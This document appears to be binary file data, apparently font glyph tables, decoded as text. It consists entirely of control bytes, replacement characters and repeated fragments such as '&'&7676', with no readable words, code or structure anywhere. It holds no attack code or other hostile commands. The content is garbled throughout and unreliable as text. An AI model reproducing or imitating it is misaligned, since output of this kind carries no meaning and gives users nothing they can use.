#?'J5	��{�&7367>'&/&'&7>76&'6363767676'&'&/676'&7677327654&'.'&/&76767676'&'&676767676'./&'&#&/&'&'&/&'&767676.�P"!
:!	#6

,14GC�?v	@ &



,		%	


"

$=8


,4<a68Q��W:=KM76: 
	)'%0a"$
#
#3*	57+8

6(, 
9%

&	 '
'%$IDV_]MP'H.0Q7eA��>�&'&'&767627676?6?6.7656'&#"'"'&/&/&'&'&'&/&/&/&'&'&76764'&'&'&7676'&/&'&'&76s4	

$+ $
		


	
	

	
2?N9(	
	"6A29!
P..$ H1&+$S+	
.O
$%1/$&#8	(''
!9�		@$K4-$#9.*	3

D')
$

0G`+	�����+%&6?6&'&'&'&#.7676'4/&"'.76/&#".=&7>'.'.?6767>5&776376>'&'.67>'&'&'&%676676&7&'&'&'&'&'&'#3627>&'&'.#"'&/&'&67676';7>'&'7&/&76?�	

	
&

		%
*"+

		

-/L@
+		
9#6)"�k
*TV	((
	8,QhA09*
&	&	*)		*%		+$$	/	^



z! 

	
'(
4
-&
	
		"-	
	8

	$,

I�
0(9&)

'		
44U	T		$*
	 %(

${	
����hw�����&'.'&/&&/&767676?6767&/.>2?64/&'&7>676'&%&7676#.&/&6;27"&'&7>2"7'&"327>'&%&32676&�,
	&2G]C0�
&	/\/
34

:				]TliijS	K	l
22Z,,�3'M8 7M�"2d�.!
^<!!��" E�+=9&
	i%D
&7	���3D"�qD�cZJ0	
	
0;:
'8
.HE97@)
G�9W

�;;I	3&+X<6x�3$/<.",$��Pc{��%&/&'&'&/&'&'&'"#"'&'&54767656.3265&74&#"&'&'&762576&%67>'''&'7>51'&&/&'664.'"64&�92L1
.07HAc
0
	
W�9:/$Fv#
!(N_n"F<��!J..'!(P=?'r#"O#!;(: +&8-(D!1.L<2,�0	4?	�
=./+! �((%|*""7	}&B"#"����[iy���&'&6767763767>'.'&'/&#'.76'&/&/.'.7676>.276&'&1!?>'..'&2'4.6�$-=GW

!EA]]$"#	=)5'6 $L;2144		)sa(
nbb20/RR+��-,g)	z58IK/�
��3]#
43")H*$
(F$;0',
 
&&$%H<;P	

�

&!""�
#	
(



��>Ys��01676676#>&''&'#&&3627>547676&/&"'&7654'&672456'&'&54767#676#6/&'&75&763%#7676&'&'&'&'&/&#6'&'&'&547>762"&'&76'&
2	
%
		

"
"�

-�c*	N-		!6#!2d+$	0"��+:+"�

 $)
\	 C0	��	
$G

!8)

!

�V*E1*, 5VV3	x]
����"Q������!5M^.'&'&'&76'&/&'#767676?#/&'.767676?676?6763&'&'&6767>54%'&'&'&?6&/.6767676'&76?676?6?47%72>'&'&776'&'&/&%'&7>767&767676766'&'&'.?>6'&'.'&6366&76?>32t>1(&
%$$,

1�	%	


*
#


	  (0	I	


% %	'%\X +(;��C81�
'864h%*
	^9��0U{2
2=4BC4</Q

JW]Y�l

#	


�$
	
�#	�
	�/&A

-
!

	
	5!)�
	
#&7'.	"%2E(	',/	
&)'
+#h1#'	
$^%9

8��
	
%
!
	
��&		

")"	
)6<G	&!	$61
/)�����.'&''&'''&''''&/'''&32"'#"&463&##"'&766=2565!765332675&767>&'#"'67677#"&462"&4632}O!



&9!	

		H%
"(2;612

#��3hM7D!9,	
�!	
		
		

			0 !


QT�
Z��wl%67676276&'&'&'&'&'&'&6'&'&'&'&'&'54?>3656'5&7476?>76?67676?66/&'5&'&'&7467676766?676?632676?67671676/&'&7667676?676'&'&'&/&6;276&/&676&/.766?6?676'&'&/&'&6>/5>76?676?>`
 )
#()#2

"2L(
	

<"
	


"@
	
/(	
		


				'"


$M,
�

*JS1/TJ"
		
%X-",'#
"+'"
		
.EV:)
:0"
	$		4V.-	

))
		   

6(3$2OU%9%,	%&B1G'
��u�%'&'&6'&'&'#"'&/;2676?67;27676?67>7676;27676?67>;256'4'&'&'6/&'&"7676�QA		@+ZG)?"	#	)
	#-J!&!
)!!%;��$+
%.
3�
(JF

+		&1uN?'&"	*'!
"#/
/J2$#6@7
#
������%.'67&6767&67'./7667&767763736762'&''''7777#67&7'&'6767677&'&'&>�8&
%(.;",?.")8%,1Ha
"#'!FL
!	$%%!I7
K&>3,
+	,)-
��)

*)3

Y!X�!*�wx
Z2%1r[F/8#Y'
!
<VD7QO	$8
0
3 3()
89/528*6:	i�
�3[(��5h�&'&/.'&'&'&'&73367>'&/&/.'&'&'&'.'&6726?>276'&'6767676?676./&'."*0Z@		
$/(5j?�	)B
(
		
�$
20%)
H
2;!$r�B	%H=4+7l0"
	)-
	F-
#F 
F
-"	�

8����|��&/&/&#'&"&'&767676'&'&'.'&'&7676'&1&'&'&54'&'&'&'&'5&76767676767676%&#"'&?67624'5&'&/&376?66/&�	

4	
)%%}Z
	(%"E).GL(.*%
+#:&
!!
��4I/:BP#(	)CJ IMKX
	`nU]
VZ

	!%0.) [3


!
3
	
9
 ,"'@X+-DU"#�"		
�#'#$	
�N5y����'6'5&'./&'&'6767676?67>&'&'1&?6'1.'.'&/&#767676?676'4'&767'676?'&'&'&'%676&'&'&'&7�2)F	01#	


��	

\,

 2$
"+]	&$5,%&		�1N1	J<+.

<iB/& z�	&K+#*F4
&50
/>7'�i)l5(	
#&.
		"#&L%?2
	6%{&6	
8D)Tk7D<0<$I@-�n1�CEZp%2&'67>7'&'&'6?&'67>7&#?6'&'&'7%"'.'676"'&676766'."()Aq
53*&4Xb9


��F17"
��!'./&��!+ )-�	-,�
K	"	+*"';
	"E)$	�



}!	����7&'&'&'.7676767>7367676'5&7>3?>.'&54767>'&676676767>&'&/&'&&'.&'&'&'&/&6'&#'.76?.>�

,%@,B
	
'+ J%	



2&/)		>
�F=22# �
		
			
JN	

:					

		v!	�

��3����&'&'.'&'&'&?6767627676'.76'&'&/76=.1#&'&'&/.?676'&"'&'&'&/&67367676767624"327&3676&'7676&1�	
	 			5
#
�'%[!3$	
3'
6!""1	$'lRK	
�	�+,0!N7`	
	#



		��	
AI7,%/3A<$	 
,)P;,4R����F @U\f��&/&"'&'&?67676?67676'&74'&/&'&'"#"67'&6?60'7"#&"626?6767676'%.767676#"'.76?676))	2
2
7<3*^6*
'%5!�
	

	�eD*	
)3=Zl(
)-92)�,
	
J"#<\fs4+$7
7,F??7;9  

)%

D��
Z�Y=/706#<D.�'*!
���]hm%"6254'&#&6?2'&'&'&6?62'&/&'#&676'.'"&#"+'676.'&'&'76?672'&5&654'&'&/&'&/&/&#&&#""#&'&676767265&'4?6?67'54'.'&'5&7767&'#7676'&'&7676?6?6&#'"'&76?676&'534676&/36576&'&/6267676'&#63626574&#&'&367671~
	,*	
)+#
	 )"%"&(
	
%
.(&

%' &
	


	
	3;"		


�i�

	
'
!3.&	?%81	8.#770-
+8B5;
!4 /!
#0M=$
	'%
 I
���_jt&'"#&'&'&/&'&76??>546767>7675>37676'&'%&767>.'547�
%Hvxk�'	
	%	5$1	
"	
5.'8
�W
		.�	�)+"#+�)�	
HX4h	Jq
/56	B�
	0$*r12%8
d���?�����	&'&'&/&'&'&'+&76767767676767>>756'&'&'&'&'.'.76767676767676767#/&'"'67&&'&54'&'&'&'&/&'&'?27667676?>7676&'5%367'&6%#'76&7'�,7"*5,",')(
	N5C1	2	
)o0(8��!$	%2)9:B/
'1.$	C?
>#1!�-8

'	
	$
/"
	# ��y#	,"9/!(09]""&#$!

1!&9G7Pg
A�66%/"))
	%
37A'#�#.)+#+#		
(+$ 
'-4	*	+-�4=LU.7>76767676'&'&'&'&'.6767%4&"6'&5&>2.6o(Pq >%O97501&0&")*l}>(5(J;�8P98P9�A>).Q':"J!
#0'2(
3(#)88P88�'((�DF�����%&'&'&'&'&.676764'&'.>7676?67676%7264+&'&6763!2>.#&#!"'&'&6?254'&'&'&7>&5&6&'&'&?67676'462.�9W<?!1+*	&?")90(3(/(1)
	
	%03��
	
	
�%$!	8�x
	
!""#(L+//4'69,&)	
�#$�
	+#+

+"	%

	
84�
&"2#�

$b-0�	
	$
�rCL���:l���&7676.'5&'&'&'.767676264&"%0636'&6?6'.+"32"3#3#;#3#7676&'674'&'6&%6#'.67>4+64'64'676&'#&3#3#"3#3#";2?>&'676'&'#&3#"3"3#3#7>76'64'6&6?6'&'#&3#3"3#;>76'644'&/&37676%6?6&'#&3"3#;>'&"&>� '$&EE'M4L�&O
�n	X�5n�W��!./A/.-*


	zAB .% 9��	

		�		�		��4&'@L	�"\5% 
M&)JA(y0 	��(P-�U/A//B.x%(
!		
*		&X"�1C6
�')2		 #�		%)
	*>!ZY-O28$""�|M���&76&/.76?6'&&'&7676/&'&76767>'&%&'&5&767676'&'.#"36767676767&7&'&'&?6767676764&'.462�!$
	�/
	
	.			56
		!	�#)>

> a8/$	

%R75 (@'!
$$!	
/- $')	9 
=K*#?#.'


�$&"77!*"" &		=�EN37674636?67574?6?&'267&'&676'&'.#&6.6?#8Z-??ORJ*M/e\8t
>!
L<IB
	#&"0
ED=,$�!
�E:\7D2*aB�
)D!6�I"BKL?70!(_d("
! ��St�154&&'&/&7626736'&/&76'&/&676767>65&.76'&'&'67676".63'"72>&�"&

VX"	' 	

BCRC
!


#&9#$ND'%��jO ! 
%QS		
�

Z_
	Y-(4	.>/Kq,	 /3L Cf	(Q,=>{.(G
���Tcv���&'&'&/&67676'&'.'&#"'.'&'&'&67676?676?>&'&'&7'&#"&5&5&6'&'&76?2&'&67676767&7676?�
	


MS!#H�

&
!
,#0 >%5%
%<=)4!E3�E+N%
	�		>)�$	�

'
 <+ #"Ra	$R	#
<GM#(!:+
!	<+&D
%
*$
%!%L9��
 	
��)
%	
�		
"0"/.2����PYp&'./&'&=476'&/&''#&#3;626'.#&#676'3626".>%&'&#654&�	
M]#HK

5J-F	�9�l6	3+&$���B"(++6]:O#
	
���2c!gi6


+;�;<(1$7&
 @68

A-6kQ:b=
_Fq��g�&'&7676/&'&'&'&'&'4'&'.?672767676'&/&7676767676'"'&6?676'&'&#&'&'&7>&'&'&'&'&'.767676?66'.�	
		

%,+




"			�



7
	""


I=


		6		
	
��
4

	"1"' 4
	


<!$!

����%&&?67>&"'"&?67676767667654'&7676'&"'&/.4?676?67673676&'&&6?67676'&'&5&7676.#&/.#5&7>767>'&&767676..76'.7675676767#>&'&'&6?676276'&"7673>'&'&'&'&/?6764'&/&/&'763676?>76676&/.?676676&t




		*'
�
	



:


&#	
			52
-)
 
	
"		$#

('

	"%
8&2&



�

*$	
			

	
 				!'2		'
.
0	$		


&
2


$> !C!!@




					
(	&;

			
���;Yfs|�476&'&76767676767676#'&'&'&'&'&!#"36767676767676&#"2>4.!"2>4.&>&"&>gA)2CgD02+!$/'F!(
_SFS+*86@0(���	
* %.."'%/ !'$
��!:"!9D:#":�"9"":E9 "9�
" �"5MED\7.5
Q	*D5r,	 (+d�7.

!6,8<BT0%	!�!9D:"!9C;"":C:!$:B9!�  "�� ������&'&'.'.'&5&'&'&7"#'&4.&?6'&76'&'&54'&'&'&2?6'&767676'&'&'676?67>776?6?676276&#2626'&'&&'&'6'#&'6W
		


9'#$	
P
A$
	(G1I!
	3	#/	(
	��
�	94
		
		

'."+4&1-<
"-	YC$B/%)8A(	*'
A(/623 ���

'+
D	������6'&'&'5&66767676767'&76767'#'&'&/&''&/&'&5'&7&/&7>?&#6?676'&'&7676.'&'&'&7676764'&'&/&6363%766&'&'&'&'&'&'&/&76767676767676>'(
9&	
	


0


CV
.# $)6
	
!
,,"'=3
L#$!


(60
�v"&3
	
/P&
*1*`XP4
*C *1:		E0
&	"		

	IN5
)?f?
D4/

)
		"(:,'.U9?8
%2.=
*
	`E�/-!������&'&"'.7676'#"'&'&'.'#&'&'&'&"2?2?7>'3676&76?67'&/&7676>'&/&'6/.632767674'#&'&'&'&76767$!,'	

(:AF	W1A



	

?-&



,(: "	�Q

V�#>6B
	?3	
-5	
	F)A0	X&
		

*&	"&C#V$/!#	
	

#$7�s$��^�'&'.+'&#&76'&5&/&''"'&/&'&'&76&'&'&'&&'&54/&'5./476'&54?6'&76''&76?676?6767676767676?676/&7>6&'&'6S
	(
3"*$"	


	
	):
!1*&)

�
3(8
I&44
#Fy"	

=�A$,-0	"
%	1	 L5
33
	!! 4
"!#%

	����;A[u���>76767676&'&'&"&'&676'&'&76.6'4'%62#&'.%&'&#&'&'&/&76767676&7>76'&'&&'.67676&'&7.7;76?&7676?67632676'&.546?676?'&/.&'&'&'&�46&
			#-9
'5
01
6"�
�cA�B*
�bbMj
		
:��i(
	s!! 	)�		
		�;9


3,+'2#'

"#!!-$%J�43#		[MKI	

'�D#



	
�($


B
		>�
			

9
!
��{���"&'.'&76?6?'&'&#"'.'&/&'&?6767676'&7>'5&7376?6'&56?6&'.67676?676773267676&676?6/.&'&'&76?6&#"76763232767654'627>?>&'&'
 	


	5?'	"A
1




,#
	,
U="
-(%&0 94l


�
	/2

C	
#��
%0	
1<#G2.E		
t{?E2/&
"	

#,			


?(%@$0cY;>	I8

	|


	
G)21	
+"(�			�uK�������&'&'&'5&'.'&/&'&+&67676767676?>&%&#&'&76?56'./&/&'&#&6?6767>767656.%"376'&%7>47765.'7%3.�	
!
!	
(#	

	
:�i���

��	P
2f

?
	


D#J
	
%03





���	 
T�
���PI&'&'&'&547676?6767>&''&'.7673676?67>3i
	F)(+';0G)!!	42+!
9i


QFB&&��/%+#1X20?A:4)  
EA3A*
		�`			0.KLV��
B
���6BKYesy���&/&'.672!'&'&767676?6%6&'&26''&'67'>'&67&'.567437&'7#'"&'&'&'#&"&/�
NS	S5

(	+�R<�3XH_���2:A!5U=t#
%$�dh%LT��7n"#G1.	
h6+W|�/*�')	./.0.

,'/5K%UOoV�/dNG�s229W0�+�	NLqlD?.�(KB=+l(:�H)46r.1��VP^pD&'&766'76=4'&7>3>76.676676767>&'&'&'67>&'&67676'%4/.'&#6.'&#'&7>'76'.7676'.>..7676.75&7>&/"5'.'&'.67654&7>&'.'&7636/.'&767676676=6&5676'>.7676'3'.4@+
	$($

: 
%(1)��"$��8/
"j$,$*-	+
	2
8?!A/=7$


$0	'
	

(&

	J63,.?$/	$	8�7%

	F$



' #	
DW+1 6!6,07��N��RY':��$A=;=
'W@� /		
0
#%

		!$%;
)




!/&		
#
G
,;V
,"	,!.).4��5Ogs}��4'.767>'4'7.>&'&/&'&4'&767654/4&'&>'&'&'7>54%&2>&&>&%7>56&�R- <	8/	�	U	*8�S	3/Y		�8!
*�!
'��	 �	>^3+$%I.8�#EM7:/7 &?+4U=p$-&#;'2<Wa]>
	)R+9;!*#+2�� $8\''"!m)&"!g	""��%�����&'&'&/&'&'&'&'&376767676'&7676767767676'&?676'&/&326?6767676'&/.767>676?'&7676'&/&'&7>?27>2'"&462#"&>2>.7>.265&'#	K

	W03 

&N,	
	
					

	

	



  	��23/?@\	'(�""2#"
�
	�V*	
%
>-

/><()%"!
-$,(# $#(+2!# %(
>P)*#
.#*$ ;#!%)%*$#%%/" @A/		&
2;3>^?5.)
(8(|!3""2#U

,

�mf67>?676&'&#&'&'&'&/.6?676&'&'6767676767'&'&76'&/&'&�	 /"O1=
#3+$5S>OE15;(A&(^N"%"
	H&


	a

.-9E.	M(	&,?[	��
"/8GW���
$"'&6762>'&7676&"767&'676764&"654&76676'&'&'&'#'&'676767>7>76767676766?67676767676767.'27>'.'&>76.676?2>'703676/&'&7676



�
	�
		6
k�1
�
>Iu+B
		6(!
	
$(%


;!&�? 
M	Z

��	1�	
	
_	f	;	
Y	M


T(
	b
[!(2	
 2(
	%,	#,/$


	
-4�"d	
-!		 

�	



��;Nar���&5&'&76?&'&'&547676?6?67&'&7676767676'65'&'&./&676&'&763>'&'&'&'4&'&'.'&76?67676?'&67>767>7"7>763536#'"/&'#&'&'&?6763'7>74"5&'&'&'&'&/3#4'&'&756'&'&'676?67>76'&'67676?67672764'5&32276762767"676'4#&'&D%*!

	
+	*'
2'
)
& 
!	
		

	-'
	
*.2
$H.
<FJ!	,5#$ .&& * >


26



	( F
((
("=M'(/L)"�	#0.#
1$�SP15)2: (2-
0+o-
$;1-$%	
" /4
 (.*!4&

	

					8
#K'545
$D
%
!

2R

3"(GO["WF():26!


,	!	35**9
$5B
/.#
 �3:p
	��(#D:1#)#Q$ 1<(��}������'F`y����7r��������
&'&/&'&'&/&'7676?6??>/&'3/&'3>'&66762?76?67?6>637376/775&'05&3676'&/3'&7676'.676?67#6'256'&/&'#&/&1#'&'&'&67676'&%6/.&76767>&'.6575676767%&/&5654'5&6?676'&'&656760&>7676'&%64'"/&'4'6'5&5&767'.5>?>7&'"'&#'&#'&7>>&"#'"67676&754'6'&7767676'&&'.?67266?676'&/&'&'76764/&'&746325&673767>326'#&'&&/&&?6026'&'&/&&''#"3276&676767/"%"/6/.'%6?65'&'&/&%3763636'#&'&&'&6676&'&zV2%CV:
H"C3	
				
		00A$��!
�+
"		�	�
-�-'->V$	�J
S
0I"
#1�9
7
	��"
=$)
�/
	��)
�

	

	
=	9K
f

� 		�	
	�	 

	5!�
	�ZA[:'
((#-%�2%=O8
7+�,%-+


�'2.��1
'" 
d0-N	^/


+M
8'		
	
&9
�2*H9
%6?20	(OL7%KO2.!P "#�,$
(CJ
[@
	]�
LF5
@h	!=5
>8L7=.Q>�
+ +#
K 
	O%#+CC3QB	BUO
,;4F.(
5F7I
			

L?,/F^'6 .)"%<�.GE)5Q
	$
	
�
	*
9n *+
	6	#
&'
���@IOg325'.'&"#"'6.676?&'&67672?67&#"67>7&'#"#&756?67#&545#&#"2#'&326?62?65&6327676'&'&7367676&'&/&76?'&767676'&72572?6764'&'5&7?676'&'&'&5676?6&'&'&/&'&54&'&'&'&/35&'&/&#"'&'&'%'&?67/77'676?&76?676y&L.E.-!$DB��mG"*"(4-;&,$/
"

-

"87;&!6B ,
48(*

	%	.1c6%";>DL<4D%Zz=3
@A^@

,�L
b<�	!			z"(	3$E>#		


+J0		?
		$.	
	2:	BD`O	:'.C-"
!+D)))^)
":#'
'C	
T%
1�_�&'#&4/&'&76&'&#"&"32'"6'>7'&'&6'"5.67&76736'&77&6&'&"76?6&'7326'&'"5.&'5&767676'7>'5.'&&'&767676'6767>726'&'.77>'&'"'&7676?67?>76??67>'&?676'&/&'&67>'&'276'5676'&/&'&67767676&'&'5&7613>7676754�

'		#\!		
	!"/'7:*

"4
$		

3))2	





,	
		
	
		

�	

	


-&

	
	


-	

#	

	
				$A /
	
	

""	
	

	
	
	


			

	���.7@E���&/.3>4'.'&.6;6>76"&4627"&462"&745&'./&'&'.'5.'&/&'#'&&3767676'.'&'&'&767676?6;6767632?6.#/&67>76'&546&'&'.>762"4<				

	

u



[

1
�
	
-+	


	
		
/@E#
4B-g	)	


	
	
,

&		d			
		2	S-
<81+$?(*)!)
!
!$

	


J
	

H/"&$#,'
-%7	����Lakp{���&'&'67/67'&''&7677676/&'&/7767>.7>&32774672.&'7&/6?7"&462"'77>'&'&'676?�)8@0p *"U'	<)&""!"&!-!�&

+$! $�� 
L"#)O�&))9)�!6	B('6('�P(
 L	��EbgM��.!L%X).
*G+_!
 ,2	*&


	[_O# 4!n)*8*(�A	B Q(6((6($7
!Q�@"FW	���D{�����6776'.'&&76."&"/"/&'&/&72?6767656&'&&&76767>7676/676&'.7>'&'&'&'&767>'&7676763&76767"'&57>/6654&"3�
%
"!#� + �-:T	- 6=-9+?+�)&-[�[�,4$.'3#=27,IJ$<"	!E�!
#N05A/*XA2!	*$$'

0.
!'�4+ b1



6 , �

		!
7)�UR.
()0L@.$
3%45JB@6N-


"�.#+ $+ +=7,	#+O1#	2)	(F.)$1!(�
2'�N��VWx���&'&/&'&'&'.76&'&'67&/7&'&'6&'&'.'&'"#?626'&'&'&#'"762&/&'&76?6?67676727673676'&#"5&?67654>2776?67##6/&767?>376/&'&267636?6?67676?>/&/.63?6'&'./&'&'&76767676'76&=&75&&7>&'>'0#"&7466'&47>?676'46673>/7&'&&?>/&54'&'&'47T
	
		#3





	
	
7	
			


)


		
!


39RAK$,94F($���	
G
	b		
	�



�$&+

	
&&
	

		S


	(										

	 	
tTY		/

f�$H	I!


&��	

					

	

���(1:.64'436'.'&767676'&'&"#3'&'&'&76767676'&6764'&'&'&>7676762&'&'&'&67627>'&767>1>76&'&/&76?67676&'&/&'&'&67676%""&'&76"&>'">&"&462'"264&� )		8G*3"17.02*

*$9			
!&'
("	)-

	'
$!

.4#
+%>-






 	(	
	0LU8$�!#Z'67L77()�
	=
	9)	=+6=
	CH5 -%.(	:/(''
$73$J

)

!"!
)'",.(	
	
(			
	


,	-		1@'�"/) 7M77L7�)*3����V]d%&'&'&/&767676?67664&"3176'&'&>767>7676&"265'.'767676'&&'&'&'.264&#">&'&'&71264&"&'&6&'&/&'&'&71>4&".7>676?67'.'326=.#">76'&?>2676&/&#"3267.76'&67676?676654&"3>&'7&'67�	(&
	%

#

'
	%,

		 P/77/P 	

,%

'

	/(#

,%	
				&(	 	*	
99)
	
.;%4&:.):9
	+
	 ��

��)
	"R
&

$
:
	+&!uM--Mu!'&+	
:.$

+&
R#)!
#

	:F'

/"
 ".

'F:
#
	!




��7V_hsy����������%&'&767654'&567676767676'&'&'&'.?6&'&72>.%2>&">'&7'765"'6727"'&'366'.6?464&674'&'.&>%6'&'&69@q�r
'3&%$F^$01E30��0F23E1�

/H%�!%k'"8E'$T
��	�, !��$k/<8G[5	"$!%%,VW(,230o/3(=(5.(!)$#	)%	\�.6(=/E22E1S#11D31\�%/%@)+i)�
		

	
�" #����1?N��%&'.7676'&'&'5&'&7667656'4.767677>5&'&%&'.'&"'&76767476'45>7676767676''&'&'&767676T
			-*	�.&)
@%h4);!b23t{3]E&	A�V__[?A		�,*EFMUGD&(,+DGOW�K�
	

	
	
		

�#0
P(*v&*(-",",D4 $/-
$7d0+
X�l"!KM`
	
�KDA&(+*FHUPEC&(U����Ccs��������%676'&'&''&'&+&'&'&76%.&77>76'&67676&'&#"&'&/76766765.'&?67676&&5&6327&7>54&&5473>&#"''67&767637&'&67M7U		 "9 "2#JA!"& 
!n\A(6=5,L(),��	"4
�$=6M
#	S-)'�N
�(

}		#
U
	�,	�
43�7:?IrE	

	)	
).00
		

/ H< '3!0*6I�
,#��NE<:"
U_T[&)D?F�##Y2
02
$
',
�		zE,
�
��������#6'&'&'.'&'676?6?4'&'&''&/&'&'&>;676'&/&'&'&'&'&&'&76'&'&=4632'&6&/&'&7>76?676767676&#'&674'&'.'&632&"&'6767676?&67#"'#&/&6?66'76&'&'&.'&6?667&'&
	
.6 ?z�$e.$-Q
?#L+! 	
!#/


 YV
NT		#.=+7+	#>SE_7>O
	
	

<  +0

1E<
4�"'>54�	

'x" 7f	+A:	(,	
<B<0"+
	T$%\5%
'
>&I*	
.#)	
	


	




# $)!+)-,$)HC7<�
	(!
	5
�
,H ��� =Fh&'&'&#2676%767676?67676?'&'&72&46'&7'&/./&/76?'&#"~r$L		U:E /
V1y��(;?EfYjFi
H4�#10F23�"]�$ $x�G	��pD9+$	&2Jc ?E�o#)$4=+!
@b�4O
�2E12F2�;:998e	C;BT	��;[x������-=T`l���7&76&'&'?>'.6'&'&'&'&'&'&'&'.7>>&'.6'&'&>76'&&766'&6%676'&#676&7676'&'&76'&'&676&7676763%67654'&'&'&67'&'&'&676&767676766767&'&676&767676"74?464&#"676326&76737&/6'&'&&6#?676'&'4#%456&'.76&/&6'6?&I$$�o��

>?E	! (G3$	4nJ

	 "#
&(='�/

1&'?

(			��~�LW�d"
c�81 �u6GBJtG:]X	K�-3K?v�	
	.)1
�wL_

�]

-%
#U�^C7`�UDN&B.19/-!	�,N+J�
>
�	*<#�!8+# 

*
		1
|)C	Y
��3

K
 

/,
�*
8@/8") 

)
E+/05t
	'n]?
*}#8
�
!&@22	đ#
)4	
	G- 7)3

5�$!~@	
/*k!!=1>"
flh3

	'!;;'	*0&7@%

$A
���#1@Rb%.'.76767676'&>'.6%676'&'..7676764&'&>�&	RcL
"96OD=6%
T/
2;>4;��6/D6/�6#)L.=.,&$��62*)%&!:$=#�6$/<<0%#!HQ!%',0.475zC#!
>i(I"	(/m?;&x1##D^,
4+*(35p<c%<6;-43���}�676'&'&'&'&'.6/&/&'&76?6763!.&?>322?67>'&'&/&'736?676?&'&'5'"&462�5e�hN*&/),#.*#
(56120! $=
 G)
q8I1	)$=.J�Y

M%I��SQ}

!
7+'N	
023/�		
	
%2
,$3R#%1`	.
���z��&'.676?.'&'&'.76767>36267>76373/&'.76'&/&'545>>56'&2"&46'.'&5676?6767>�0]"5!
9


4	!:(
	9)@$	
�

[(%#(/  *�( 

	&8. 
1
9@.	)7PCJ=
		
	
Lr[_		
N'%

	�v&
=1
")Fa ~?OW��H_n�����&"'&'&'&'&&'&/&'&'&?76767676'&';76?6756&/.'&7>&"''.'&>7&"&/"&76>'5&'&&67674&''>76&'&'&776&�2(,PC>H	$ 2%/"�[bM=.
	

%
��		(2
!�!3UD")�=?��	

a	

�+	6
h&#+
/IW�2!	)4/86/	*&,��	
0!);
6H0�"}
	
		

	

�

���������;66?676?676/&'&'.7>7>.&'&76'&7622?6766767276&'1&7676&/.2767676&'&"#6/&'&&76767>'&7>76'&6


	
##

	(	
p6@5E8(>Q
76




-	.+$D
!{
�
�
	
=�	
	0)			J2$!
6X&.+v-Pp?@/&7+!GX"	
					��%*I
.(#6T�

	����%"'&#.'&'&&76276?676?64'&'&676'&'&/&/.&/&76./&/.'&#&?6767676?67676&&5&72�- 	0


	
$
<*+?*	
		

bW
2'.&+
M[=f			-;0!&	
o	�%
(
)
%""P
	


"+/"'G4#7?B.
	
	&(	%$	

		
Is#&.
	#



'	
����]bw&'&&/&'&'&'&?#'&'&'&'&'&&#"7676767>76?&'&&6'6'5&76767&'&�3*0
-
E$/>fm#
			
=L_l+'!=/
7
�,&A#0.o8
0E=W0B_(+5Ba	LQ@<4(
4,

8:6
			�:]=Y;X+

W����fk�����a� 7676767#7676756'276&+"'""/&'&'&'&'.7>76&'#&#67&+7676763'6"2636?367&'&7676767776767>&'&'&'.7&#2367#&'&'&'.#676766&6767727>7676?&372567673725&547?6'&7>76?66767676?6765&'&"'&.?64&'&66766?6&'1&7>66'&'&'&/"43?66&"#&'&&74?656'&'&7>>7636?6'&7632636'&54&+"'#&4;7>32.'�9`"
c�8%-7�




/S

2




b�@
			
:"%C+$

>:#+#)
!.
"
'dCJ )+��
"#�



(+
,7*=<*cb/4
	,	"#
;$sD

	
	
	
	
�

			
	
		
			
�7 ] ,	
,


<!@

.��!&!'

A: 	
4%
�
	',=>K
	


�
#

	
0!

3	
$
	
<#l
`�.	
					
	
				


			
		����cl�'&'&/&'&'&'&76&/.7676?67626?'&'&/&61"#"'&&/.>.&'&'.'463676W9%"!>&4�C
>]-o5!
'N(:n24h7	�7�Y
N#
	
M;_Y6�	�	
	�+Q�f	
Lp9	^:A		
,)*V.

a�N��&2
�36�
��V]cz&'&7676&'&6762'&'&'&7676'&'367&/&63.'27&'&'7&#&&6'&6'5.&'&/.4'/&4'5&627367232&3767676?6'"36763766'&637&'6'4&7&5&67&76?62#26?6?676#262?6?>7676727676767>%&>27&767.7676?>'�
ep18"
#"

(7


WV

.[I
 74$&



	
		#

	
	
			
	TV>I

��
6�3D-
	


	 1		


0
 4	


				

(5&)


��5;KXcp|$'7676'&'&767&'.'676676&67546"76767&/&'6767'&'&'&676'&'&676k���%	
7
	=."H"J_Yuj�H1
.!�'"	c'
�($!?.i
\��qnr	�L	K%�c7
1* >

&~ID!
	
1aZ&	��	
l.95GUYR_/"	e&!.694=C�3[�	�_
:�
�	�L*N�����%'#&76727676&'&547676&'&'&&'&'&6?6&?67&7&77676&'&"&5&'63'276&7676&'&'&'367>'&;76'.7676&676'&'&;26'&%&76?6'&'#;76'&%&#"'&''&%	MX.
;&=��+2	
8=K!#��
(
J+'r
N

�
:-('3*�86
i�	m��
"
]C
�	
4lS?
A[Z

	)%.Q
(m�	!
 n�HB&$-.:	b
 %\D

x"	1
		
(&&�	
	
(7-	
}$�������Sgt}&/&/&'&'&'&'&'&'&/&'767'27674?676&/"7&'&74?47'2/&'&'#"6376?>?'#.767&6701/&232#736?6763763&'"&5477&?>767>76767676??676/&6675656'&'6'&'&'.'&/66'&'6'&'&>6&'&'&#6&'&'36'&'&6?66#5&'&'&'&"#6&'2754'&'&'&#"576766'7436%6&6'&7>'&/&/&/&'&#&'.676'4/'""&462'&7>'&74636/&7437627>73276762767622&'&'&'&&547676'"#676'&7"&462�C
.AG81	)

S$AS;O>Wn 	.!	


	!

		*
	

	
-&			'!#
&8	

!3?B%8.,
!%KX98,(2'

%,0
2,& 
 1/		@G2+��8IE�/" 	
	
86
G


%
	9�G*
30*A!!	
'' !;08:	++1'!'-!	


	

	
#*')!	#7/$,%+=	#E	(,.	
6
#3-$),
0/"	=%)/0?>='2=@�,��$4	#)
		
	4/ -

"	





�
		g

������%&'&676'&'&654'5&'&>'&676'.76&'.?6&.'5.'&'1&'&676?>767676'&'&'&'&'&'&'5.5&73#'.'&>.7>'&"67676"&'&6767".62'"264&&432"27&�!

	

'		
					

		7!
		
	
		

	
1
	
 "#)
	
2/&Y)��	+"#1#"
R	�-4	

	



	
	


					
!	
3	
4
.!(

&  (
1"ME5-$

	
	!(&	
		9##5
$.OG�"0##1!V
		���%&'&'&'"'&"#"'&+"43637>?67&#&'&'&'&'56?6?676'&/&/&76767676/.6327676�%0	�
%''"a@;6
L
		(	
		
'%PA.':		
*	))

-*

+
			%52%"F 	��� Xp����6764&/&'&76'.>.6&'&/&6?>2676'&/&'&767676&'.'&'.767>#'&'"'"1727676767>7&'&'.2567>76?2&'&&67676'&'&'&'&67676676&#7672>
N�HU_51�Gyg
�
g
`Bs
	

&	

�q ],2�bQ	&+k�
t

&	
{<5oVF�,/

*#Blr�|�T����@,!F	!"�)
WB=5�

�
Q�&U
�Q!		
		,&�% <�<@�t	@'Ek
	�2d(&
e1R	>�(&
	"$%'FF
